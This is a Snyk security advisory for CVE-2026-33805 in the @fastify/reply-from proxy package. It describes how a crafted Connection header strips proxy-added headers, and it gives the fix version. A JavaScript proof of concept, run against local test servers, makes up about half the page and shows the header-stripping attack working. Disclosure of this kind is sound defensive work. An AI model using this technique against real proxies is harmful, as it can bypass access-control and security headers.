HTTP Header Injection Affecting @fastify/reply-from package, versions <12.6.2
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-JS-FASTIFYREPLYFROM-16068221
- published15 Apr 2026
- disclosed15 Apr 2026
- creditFred K. Schott
Introduced: 15 Apr 2026
NewCVE-2026-33805 (opens in a new tab)How to fix?
Upgrade @fastify/reply-from to version 12.6.2 or higher.
Overview
@fastify/reply-from is a forward your HTTP request to another server, for fastify
Affected versions of this package are vulnerable to HTTP Header Injection via improper handling of the Connection header after proxy-added headers have been set. An attacker can remove headers intended for routing, access control, or security by specifying them in the Connection header value, causing the proxy to strip these headers from upstream requests.
PoC
const fastify = require('fastify');
async function test() {
// Upstream service that echoes headers
const upstream = fastify({ logger: false });
upstream.get('/api/echo-headers', async (request) => {
return { headers: request.headers };
});
await upstream.listen({ port: 19801 });
// Proxy that adds a custom header via rewriteRequestHeaders
const proxy = fastify({ logger: false });
await proxy.register(require('@fastify/reply-from'), {
base: 'http://localhost:19801'
});
proxy.get('/proxy/*', async (request, reply) => {
const target = '/' + (request.params['*'] || '');
return reply.from(target, {
rewriteRequestHeaders: (originalReq, headers) => {
return { ...headers, 'x-forwarded-by': 'fastify-proxy' };
}
});
});
await proxy.listen({ port: 19800 });
// Baseline: proxy adds x-forwarded-by header
const res1 = await proxy.inject({
method: 'GET',
url: '/proxy/api/echo-headers'
});
console.log('Baseline response headers from upstream:');
const body1 = JSON.parse(res1.body);
console.log(' x-forwarded-by:', body1.headers['x-forwarded-by'] || 'NOT PRESENT');
// Attack: Connection header strips the proxy-added header
const res2 = await proxy.inject({
method: 'GET',
url: '/proxy/api/echo-headers',
headers: { 'connection': 'x-forwarded-by' }
});
console.log('\nAttack response headers from upstream:');
const body2 = JSON.parse(res2.body);
console.log(' x-forwarded-by:', body2.headers['x-forwarded-by'] || 'NOT PRESENT (stripped!)');
await proxy.close();
await upstream.close();
}
test();